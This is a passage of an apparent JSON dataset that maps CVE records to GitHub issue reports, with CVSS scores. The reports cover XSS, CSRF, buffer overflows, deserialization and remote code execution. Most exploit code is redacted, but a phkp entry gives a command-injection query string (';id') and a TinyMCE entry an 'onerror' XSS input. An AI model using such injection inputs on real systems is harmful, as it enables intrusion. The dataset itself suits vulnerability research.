        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-9985",
        "Issue_Url_old": "https://github.com/learnsec6/test/issues/1",
        "Issue_Url_new": "https://github.com/learnsec6/test/issues/1",
        "Repo_new": "learnsec6/test",
        "Issue_Created_At": "2018-04-10T16:07:15Z",
        "description": "metinfo NUMBERTAG SS Vulnerability. There is a XSS Vulnerability on front page can attack administrator POC: First download the metinfo the Latest version from URLTAG FILETAG second: inject xss from in feedback page,and then submit to the administrator FILETAG last: when the administrator login in the webseit and Check the feedback message,the xss will be touched off. FILETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2019-1000001",
        "Issue_Url_old": "https://github.com/nilsteampassnet/TeamPass/issues/2495",
        "Issue_Url_new": "https://github.com/nilsteampassnet/teampass/issues/2495",
        "Repo_new": "nilsteampassnet/teampass",
        "Issue_Created_At": "2018-12-07T16:17:54Z",
        "description": "Shared password security questions.. Hello, For shared password, if I understand well, the key used to encrypt passwords is splitted between an part of a key in a file and the other part stored in the database, I'm I correct\u00a0? I'm I correct if I says that a user password is not used to encrypt / decrypt shared password ? If so, if I gain access to the teampass interface bypassing the authentication, I can see the shared secret of a user without needing his password for decyphering purpose ? Other Question but related : Is it safe to backup on the same server the database (dump) and the teampass files ? If someone gain access to my server with both the webserver and the database, we he be able to decypher all the shared password of the database ?",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2019-1000004",
        "Issue_Url_old": "https://github.com/yugandhargangu/JspMyAdmin2/issues/22",
        "Issue_Url_new": "https://github.com/yugandhargangu/jspmyadmin2/issues/22",
        "Repo_new": "yugandhargangu/jspmyadmin2",
        "Issue_Created_At": "2018-03-08T13:06:19Z",
        "description": "Stored XSS in sidebar and in table_data. The sidebar and table_data are vulnerable to Stored XSS, which means an attacker could store HTML code on the database that would be rendered by the browser when viewed and potentially run malicious code. This can be fixed in the APITAG function of the APITAG and in the APITAG function of the APITAG using APITAG function on the data coming from the database.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2019-1000005",
        "Issue_Url_old": "https://github.com/mpdf/mpdf/issues/949",
        "Issue_Url_new": "https://github.com/mpdf/mpdf/issues/949",
        "Repo_new": "mpdf/mpdf",
        "Issue_Created_At": "2019-01-08T15:01:04Z",
        "description": "Insecure PHP deserialization through phar:// wrapper.. Hello, During bug bounty hunting I met one of the old version of yours library and decided to test it for known vulnerabilities, namely PHP deserialization through _phar://_ wrapper that was discovered independently by MENTIONTAG and MENTIONTAG FILETAG FILETAG CTF challenge by Orange Tsai URLTAG So, after some tests, looks like yours library has similar issue as TCPDF URLTAG library. Method APITAG of APITAG class pass value of _src_ attribute of _img_ tag to APITAG function, what can lead to PHP deserialization if value contains _phar://_ wrapper. URLTAG For proof of concept I create class with APITAG method (based on APITAG deserialization chain) and use phpggc URLTAG library to create image, which contains phar metadata. Phpggc repo also provide dozens of popular deserialization chains for popular frameworks and libraries. Source code of test class: ERRORTAG Source code of trigger script: CODETAG Video Proof Of Concept URLTAG Tested on version NUMBERTAG and NUMBERTAG latest). PHP NUMBERTAG TCPDF CVE: URLTAG TCPDF fix commit that disallow pass pathes with _phar://_ wrapper: URLTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2019-1000006",
        "Issue_Url_old": "https://github.com/RIOT-OS/RIOT/issues/10739",
        "Issue_Url_new": "https://github.com/riot-os/riot/issues/10739",
        "Repo_new": "riot-os/riot",
        "Issue_Created_At": "2019-01-09T16:12:15Z",
        "description": "gnrc_sock_dns: Security issues (including remote code execution). Description APITAG doesn't perform sufficient sanity checks on the DNS response it receives from the configured DNS server. Here is a non exhaustive list of issues NUMBERTAG The QDCOUNT contained in the DNS response is not verified. This causes an out of bounds buffer access in the APITAG function if QDCOUNT is set to a value larger than the buf len supplied to APITAG NUMBERTAG The RDLENGTH bounds check for the answer section is incorrect for two reasons: (a) APITAG is the first invalid address, so APITAG needs to be used as a comparison operator (b) The result of APITAG might cause a pointer overflow (especially due to the fact that addrlen is attacker controlled). If pointer overflows wrap around (undefined behaviour) this would allow an attacker to circumvent the bounds check and exposes a buffer overflow vulnerability since the attacker controlled addrlen is later used in APITAG , potentially allowing a code execution NUMBERTAG The size of the caller allocated buffer APITAG is not passed to the APITAG function at all. This makes checking whether the attacker controlled address actually fits in the buffer impossible and allows an easy buffer overflow and potential code execution. All of these are especially critical due to the fact that DNS responses can easily be spoofed, especially since all spoofing protection mechanisms of DNS were not implemented. So an attacker doesn't even need to control the configured DNS server in order to exploit this. Steps to reproduce the issue NUMBERTAG Flash an unmodified version of APITAG to your RIOT node NUMBERTAG Adjust your APITAG on your border router and add a RDNSS definition. Causing a crash Constantly send a DNS response with an excessive qdcount on the computer associated with the IP Address you configured in the radvd RDNSS definition. For example CODETAG Remote code execution This is (obviously) highly platform specific. We did this with APITAG . We wrote some ARM assembler code which toggles the LED and stored the machine code for it in the RDATA field of the answer section in the DNS response, thereby overflowing the addr buffer in the main stack frame. Our payload exactly fits into the stack frame of the main function and overwrites the return address of that function, jumping to the addr buffer and executing our payload. Exploit written by MENTIONTAG See: URLTAG We also working on documenting how to adapt the payload for slightly different binaries (depending on toolchain, board, \u2026 the exploit might not work because of hardcoded memory addresses). Versions RIOT Version NUMBERTAG e NUMBERTAG f NUMBERTAG ERRORTAG NUMBERTAG eb NUMBERTAG c NUMBERTAG b5e NUMBERTAG c NUMBERTAG Build environment: ERRORTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2019-1000010",
        "Issue_Url_old": "https://github.com/phpipam/phpipam/issues/2327",
        "Issue_Url_new": "https://github.com/phpipam/phpipam/issues/2327",
        "Repo_new": "phpipam/phpipam",
        "Issue_Created_At": "2018-11-21T23:17:40Z",
        "description": "XSS via FILETAG & subnet scan APITAG The line APITAG in PATHTAG and no CSRF protection at PATHTAG causes an XSS vulnerability. Poc: CODETAG Note that a valid APITAG has to be used.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2019-1000011",
        "Issue_Url_old": "https://github.com/api-platform/core/issues/2364",
        "Issue_Url_new": "https://github.com/api-platform/core/issues/2364",
        "Repo_new": "api-platform/core",
        "Issue_Created_At": "2018-12-04T13:37:55Z",
        "description": "Graphql problem with delete mutation. Hello, I have permission problem with delete mutation. APITAG This query is valid and the book will be deleted . If I have permission to delete office , I can delete another entity. I think need check APITAG and class APITAG there URLTAG APITAG P.S. Thank you for your work. P.S.S. Sorry for my English )",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2019-1000022",
        "Issue_Url_old": "https://github.com/ptaoussanis/sente/issues/137",
        "Issue_Url_new": "https://github.com/ptaoussanis/sente/issues/137",
        "Repo_new": "ptaoussanis/sente",
        "Issue_Created_At": "2015-06-14T21:33:02Z",
        "description": "Securing cross origin requests. From URLTAG if somebody wasn't using CSRF tokens, it seems like it would be possible for any malicious website to open up a web socket to do Bad Things. I know that CSRF tokens are highly recommended, but they're not suitable for all cases (I think). It could be good to also add CORS style protection to Sente to allow only whitelisted origins. What are your thoughts? N.B. CORS itself has no influence on websocket connections.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2019-10010",
        "Issue_Url_old": "https://github.com/thephpleague/commonmark/issues/353",
        "Issue_Url_new": "https://github.com/thephpleague/commonmark/issues/353",
        "Repo_new": "thephpleague/commonmark",
        "Issue_Created_At": "2019-03-21T21:56:59Z",
        "description": "XSS Vulnerability. An XSS vulnerability has been identified in all versions of this library prior to NUMBERTAG unreleased). We will be releasing NUMBERTAG shortly to resolve this issue. This announcement will be updated with additional information once the fix has been released.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2019-10015",
        "Issue_Url_old": "https://github.com/baigoStudio/baigoSSO/issues/12",
        "Issue_Url_new": "https://github.com/baigostudio/baigosso/issues/12",
        "Repo_new": "baigostudio/baigosso",
        "Issue_Created_At": "2019-03-07T02:41:00Z",
        "description": "There is a Code Injection vulnerability. There is a vulnerability which allows remote attackers to execute arbitrary code. The 'BG_SITE_NAME' parameter which includes malicious code can be written into APITAG FILETAG The content of APITAG are: FILETAG FILETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.2,
        "impactScore": 5.9,
        "exploitabilityScore": 1.2
    },
    {
        "CVE_ID": "CVE-2019-1002100",
        "Issue_Url_old": "https://github.com/kubernetes/kubernetes/issues/74534",
        "Issue_Url_new": "https://github.com/kubernetes/kubernetes/issues/74534",
        "Repo_new": "kubernetes/kubernetes",
        "Issue_Created_At": "2019-02-25T19:39:09Z",
        "description": "Placeholder. Placeholder",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2019-10063",
        "Issue_Url_old": "https://github.com/flatpak/flatpak/issues/2782",
        "Issue_Url_new": "https://github.com/flatpak/flatpak/issues/2782",
        "Repo_new": "flatpak/flatpak",
        "Issue_Created_At": "2019-03-25T10:08:54Z",
        "description": "might be vulnerable to an attack similar to CVETAG . On APITAG , MENTIONTAG wrote: > Snap just had a vulnerability where the TIOCSTI seccomp filter could be circumvented. > URLTAG > > Is bubblewrap also affected by this? bubblewrap isn't directly affected, because it doesn't try to prevent TIOCSTI, but things like Flatpak that use bubblewrap might well be vulnerable to a very similar attack. From the snapd advisory, USN NUMBERTAG The snapd default seccomp filter for strict mode snaps blocks the use of the APITAG system call when used with TIOCSTI as the second argument to the system call. Jann Horn discovered that this restriction could be circumvented on NUMBERTAG bit architectures. A malicious snap could exploit this to bypass intended access restrictions to insert characters into the terminal\u2019s input queue. and from comments at the beginning of the snapd exploit: > This bytecode performs a NUMBERTAG bit comparison; however, the syscall entry point for APITAG is defined with a NUMBERTAG bit command argument in the kernel: > > ERRORTAG > > This means that setting a bit in the high half of the command parameter will circumvent the seccomp filter while being ignored by the kernel. If Flatpak is vulnerable, it will need its own CVE ID, because CVETAG is for the snapd codebase.",
        "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.0,
        "impactScore": 6.0,
        "exploitabilityScore": 2.2
    },
    {
        "CVE_ID": "CVE-2019-1010003",
        "Issue_Url_old": "https://github.com/leanote/leanote/issues/719",
        "Issue_Url_new": "https://github.com/leanote/leanote/issues/719",
        "Repo_new": "leanote/leanote",
        "Issue_Created_At": "2018-01-03T12:01:28Z",
        "description": "XSS in blog post. You can trigger an XSS creating a markdown note with the following payload: ERRORTAG Converting it to a blogpost and opening the link will trigger the XSS",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2019-1010005",
        "Issue_Url_old": "https://github.com/Moeditor/Moeditor/issues/156",
        "Issue_Url_new": "https://github.com/moeditor/moeditor/issues/156",
        "Repo_new": "moeditor/moeditor",
        "Issue_Created_At": "2017-12-05T09:06:42Z",
        "description": "XSS to Code execution vulnerability. Hello, I would like to report a XSS vulnerability in your application that leads to code execution. I have a working poc that I dont want to post publicly. Please contact me at EMAILTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2019-1010005",
        "Issue_Url_old": "https://github.com/zhuzhuyule/HexoEditor/issues/3",
        "Issue_Url_new": "https://github.com/zhuzhuyule/hexoeditor/issues/3",
        "Repo_new": "zhuzhuyule/hexoeditor",
        "Issue_Created_At": "2018-01-03T13:28:12Z",
        "description": "XSS to code execution vulnerability. As this project has inherited the Moeditor based on the information received here: URLTAG I would like to report XSS to code execution vulnerability in APITAG version NUMBERTAG Please do contact me at EMAILTAG for the poc.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2019-1010008",
        "Issue_Url_old": "https://github.com/emoncms/emoncms/issues/763",
        "Issue_Url_new": "https://github.com/emoncms/emoncms/issues/763",
        "Repo_new": "emoncms/emoncms",
        "Issue_Created_At": "2017-12-29T13:08:30Z",
        "description": "Possible XSS in \"My Account\". Hello, it is more a beauty mistake than really harmful, but when logged in as any user, APITAG code can be executed through APITAG APITAG APITAG and APITAG Page\" fields in the My Account page (see appended picture). Still the input should be sanitized. It is already prevented by APITAG of the input in FILETAG . Regards, jna NUMBERTAG FILETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.4,
        "impactScore": 2.7,
        "exploitabilityScore": 2.3
    },
    {
        "CVE_ID": "CVE-2019-1010016",
        "Issue_Url_old": "https://github.com/Dolibarr/dolibarr/issues/7962",
        "Issue_Url_new": "https://github.com/dolibarr/dolibarr/issues/7962",
        "Repo_new": "dolibarr/dolibarr",
        "Issue_Created_At": "2017-12-14T20:21:19Z",
        "description": "Multiple XSS. Hello, Several reflected XSS can be found in version NUMBERTAG This is because the id parameter does not get properly validated to be an integer when called like this: APITAG ` Therefore php code like APITAG Will lead to reflected xss as it can be seen here: APITAG ... and many other scripts. Cheers",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2019-1010017",
        "Issue_Url_old": "https://github.com/savon-noir/python-libnmap/issues/87",
        "Issue_Url_new": "https://github.com/savon-noir/python-libnmap/issues/87",
        "Repo_new": "savon-noir/python-libnmap",
        "Issue_Created_At": "2018-02-01T04:25:53Z",
        "description": "XML Injection APITAG attack. Issue Libnmap is vulnerable to XML Bomb attacks using the following: URLTAG Where the Issue Occurred The issue occurs within parsing of XML reports for nmap. The exact line where the vulnerable parsing occurs is given below: URLTAG Reproduction steps Run the following code: CODETAG Remediation Python does not contain any fixes for this vulnerability, but that doesn't mean it can't be fixed. Searching for the word DOCTYPE, prior to parsing, and raising an exception should patch the issue.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2019-1010039",
        "Issue_Url_old": "https://github.com/AKuHAK/uLaunchELF/issues/14",
        "Issue_Url_new": "https://github.com/ps2homebrew/wlaunchelf/issues/14",
        "Repo_new": "ps2homebrew/wlaunchelf",
        "Issue_Created_At": "2018-03-02T03:07:08Z",
        "description": "Buffer overflow in loader.c. There is a buffer overflow vulnerability in the loader.c file. This is in regards to both the s variable and the partition variable. The partition variable contains APITAG which is user controlled as displayed below: URLTAG This variable has a size of NUMBERTAG characters, making it simple to overflow: URLTAG Running with APITAG NUMBERTAG A's) will make the application crash. This weakness may be used to change the intended execution flow of the program.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2019-1010043",
        "Issue_Url_old": "https://github.com/ec-/Quake3e/issues/9",
        "Issue_Url_new": "https://github.com/ec-/quake3e/issues/9",
        "Repo_new": "ec-/quake3e",
        "Issue_Created_At": "2018-03-04T11:45:39Z",
        "description": "Buffer overflow in cmd.c. A buffer overflow scenario can be created within cmd.c. The APITAG variable within the APITAG function is vulnerable to this attack. The APITAG variable assigns all the arguments within argv to a single variable, space delimited. URLTAG This variable has allotted NUMBERTAG bytes for characters as displayed below: URLTAG If we provide arguments with length NUMBERTAG this variable should overflow and cause a crash.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2019-1010044",
        "Issue_Url_old": "https://github.com/archivesunleashed/borg-reducer/issues/4",
        "Issue_Url_new": "https://github.com/archivesunleashed/graphpass/issues/4",
        "Repo_new": "archivesunleashed/graphpass",
        "Issue_Created_At": "2018-03-04T11:59:36Z",
        "description": "Buffer overflow in borg reducer. A buffer overflow scenario can be created within borg reducer. The dir and filepath variables within APITAG function is vulnerable to this attack. The output variable is set without any bounds at: URLTAG This is then later used in the APITAG function: URLTAG Both of the above mentioned variables are of size NUMBERTAG If we make output have a length NUMBERTAG a buffer overflow scenario will be produced and cause a crash.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2019-1010057",
        "Issue_Url_old": "https://github.com/phaag/nfdump/issues/104",
        "Issue_Url_new": "https://github.com/phaag/nfdump/issues/104",
        "Repo_new": "phaag/nfdump",
        "Issue_Created_At": "2018-03-17T16:18:29Z",
        "description": "Multiple security vulnerabilities in minilzo.c, nffile_inline.c and nfx.c. Summary nfdump (commit APITAG is affected by multiple security vulnerabilities in: bin/minilzo.c bin/nffile_inline.c bin/nfx.c For obvious security reasons, I voluntarily omitted to mention the affected lines of codes, so the developers should have enough time to fix these issues. The program's author has been contacted with the necessary technical details. Description By crafting special malformed nfcapd input files, an attacker can crash the program by forcing it to dereference invalid memory addresses, and _may_ overflow heap chunks to get arbitrary code execution. Feel free to contact me if more information are necessary.",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.8,
        "impactScore": 5.9,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2019-1010062",
        "Issue_Url_old": "https://github.com/pluck-cms/pluck/issues/44",
        "Issue_Url_new": "https://github.com/pluck-cms/pluck/issues/44",
        "Repo_new": "pluck-cms/pluck",
        "Issue_Created_At": "2017-04-11T17:52:00Z",
        "description": "FILETAG Please fix it ASAP and contact me to get more details(i did not find you email) : My email: EMAILTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2019-1010091",
        "Issue_Url_old": "https://github.com/tinymce/tinymce/issues/4394",
        "Issue_Url_new": "https://github.com/tinymce/tinymce/issues/4394",
        "Repo_new": "tinymce/tinymce",
        "Issue_Created_At": "2018-05-15T09:17:48Z",
        "description": "Cross site Scripting (XSS) issue in media element. I would like to request a security bug What is the current behavior? Tinymce is prone to inappropriate validation of user input in process of media element creation. Below I described APITAG which shows a way to execute arbitrary APITAG code self XSS. Steps to reproduce: (It can be tested at: URLTAG or URLTAG however this vulnerability behaves slightly different between those sites NUMBERTAG Click Insert > Media NUMBERTAG Type \"a\" in source and change active tab to embed APITAG NUMBERTAG Edit generated by tinymce code by adding \"onerror=alert NUMBERTAG APITAG NUMBERTAG Create media element APITAG What is the expected behavior? After few APITAG executions NUMBERTAG times) media element becomes properly sanitised. Moreover : After XSS executes, any try of editing malicious media element makes editor unresponsive for the user. FILETAG Which versions of APITAG and which browser / OS are affected by this issue? Did this work in previous versions of APITAG Affected version: _at least NUMBERTAG Tested Browsers: Chrome, Firefox OS: APITAG High Sierra",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2019-1010094",
        "Issue_Url_old": "https://github.com/domainmod/domainmod/issues/65",
        "Issue_Url_new": "https://github.com/domainmod/domainmod/issues/65",
        "Repo_new": "domainmod/domainmod",
        "Issue_Created_At": "2018-05-29T07:53:33Z",
        "description": "There is three CSRF vulnerability that can add the administrator account or change the read only user to admin or change admin password. After the administrator logged in, open the following three page. change password: FILETAG ERRORTAG add the administrator account add a read only user FILETAG ERRORTAG change the read only user to admin FILETAG ERRORTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2019-1010127",
        "Issue_Url_old": "https://github.com/vcftools/vcftools/issues/141",
        "Issue_Url_new": "https://github.com/vcftools/vcftools/issues/141",
        "Repo_new": "vcftools/vcftools",
        "Issue_Created_At": "2019-07-29T20:59:10Z",
        "description": "CVETAG , CVETAG . Two CVEs, CVETAG CVETAG and CVETAG CVETAG have been created for vcftools. I believe NUMBERTAG to be a duplicate of NUMBERTAG Based on the stack trace provided here URLTAG , this is a very similar issue to CVETAG , discussed in URLTAG I believe that the following commits address the issue in NUMBERTAG URLTAG URLTAG URLTAG URLTAG",
        "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.8,
        "impactScore": 5.9,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2019-1010161",
        "Issue_Url_old": "https://github.com/DCIT/perl-Crypt-JWT/issues/3",
        "Issue_Url_new": "https://github.com/dcit/perl-crypt-jwt/issues/3",
        "Repo_new": "dcit/perl-crypt-jwt",
        "Issue_Created_At": "2016-04-26T22:54:21Z",
        "description": "APITAG should not require a key?. If I have the following JWT: APITAG \u2026 and I put that into FILETAG it parses into something useful. I don\u2019t see anything in this module that does this \u2026 am I missing something? APITAG has the same issue.)",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2019-1010176",
        "Issue_Url_old": "https://github.com/jerryscript-project/jerryscript/issues/2476",
        "Issue_Url_new": "https://github.com/jerryscript-project/jerryscript/issues/2476",
        "Repo_new": "jerryscript-project/jerryscript",
        "Issue_Created_At": "2018-08-16T15:19:04Z",
        "description": "Heap buffer overflow in lit_char_to_utf8_bytes. Version: APITAG Build command: CODETAG Testcase: APITAG Where testcase is as following: APITAG ( APITAG in hex). Stack trace: ERRORTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2019-1010179",
        "Issue_Url_old": "https://github.com/remko/phkp/issues/1",
        "Issue_Url_new": "https://github.com/remko/phkp/issues/1",
        "Repo_new": "remko/phkp",
        "Issue_Created_At": "2018-07-18T13:45:41Z",
        "description": "RCE: query string is not sanatized.. Hi, the http query string is not sanatized. An attacker could inject a command. Here is an example that gives out the id command: /pks/lookup?search= EMAILTAG ;id&op=get It is possible to place a shell, or open a reverse shell or exchange gpg keys or execute other commands",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2019-1010193",
        "Issue_Url_old": "https://github.com/hisiphp/hisiphp/issues/3",
        "Issue_Url_new": "https://github.com/hisiphp/hisiphp/issues/3",
        "Repo_new": "hisiphp/hisiphp",
        "Issue_Created_At": "2018-09-26T08:05:37Z",
        "description": "csrf and xss Vulnerability. XSS: FILETAG FILETAG FILETAG CSRF: poc: CODETAG When the super administrator accesses, a tyonghu management account will be added in the background.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2019-1010239",
        "Issue_Url_old": "https://github.com/DaveGamble/cJSON/issues/315",
        "Issue_Url_new": "https://github.com/davegamble/cjson/issues/315",
        "Repo_new": "davegamble/cjson",
        "Issue_Created_At": "2018-12-12T01:37:53Z",
        "description": "Segmentation Fault after calling APITAG Hello. I think i found a bug in cJSON NUMBERTAG I attached source code to replay this bug. I used below script to build this code file. And also I built cJSON library with address sanitizer option and m NUMBERTAG clang o bug.o c bug.c DCJSON_API_VISIBILITY DCJSON_EXPORT_SYMBOLS DENABLE_LOCALES m NUMBERTAG g std=c NUMBERTAG pedantic Wall Wextra Werror Wstrict prototypes Wwrite strings Wshadow Winit self Wcast align Wformat NUMBERTAG Wmissing prototypes Wstrict overflow NUMBERTAG Wcast qual Wundef Wswitch default Wconversion Wc++ compat fstack protector strong Wcomma Wdouble promotion Wparentheses Wunused macros Wmissing variable declarations Wused but marked unused Wswitch enum fvisibility=hidden clang m NUMBERTAG g fsanitize=address std=c NUMBERTAG pedantic Wall Wextra Werror Wstrict prototypes Wwrite strings Wshadow Winit self Wcast align Wformat NUMBERTAG Wmissing prototypes Wstrict overflow NUMBERTAG Wcast qual Wundef Wswitch default Wconversion Wc++ compat fstack protector strong Wcomma Wdouble promotion Wparentheses Wunused macros Wmissing variable declarations Wused but marked unused Wswitch enum fvisibility=hidden Wl, rpath,${libcjonlibrarypath} rdynamic lm o bug bug.o . APITAG FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2019-1010258",
        "Issue_Url_old": "https://github.com/memononen/nanosvg/issues/136",
        "Issue_Url_new": "https://github.com/memononen/nanosvg/issues/136",
        "Repo_new": "memononen/nanosvg",
        "Issue_Created_At": "2018-11-16T15:09:47Z",
        "description": "Potential memory corruption bug in APITAG This simple Proof of Concept APITAG crashes nanosvg. In this snippet it is clear why this happens: ERRORTAG sscanf tries to parse the string, and writes arbitrary number of '%' or ' ' into the s1 or s2 buffer. The buffer overflows and triggers a segfault. This could lead to memory corruption and/or denial of service. Regards bitwave CC: MENTIONTAG for the fuzzing",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2019-1010266",
        "Issue_Url_old": "https://github.com/lodash/lodash/issues/3359",
        "Issue_Url_new": "https://github.com/lodash/lodash/issues/3359",
        "Repo_new": "lodash/lodash",
        "Issue_Created_At": "2017-09-05T12:12:44Z",
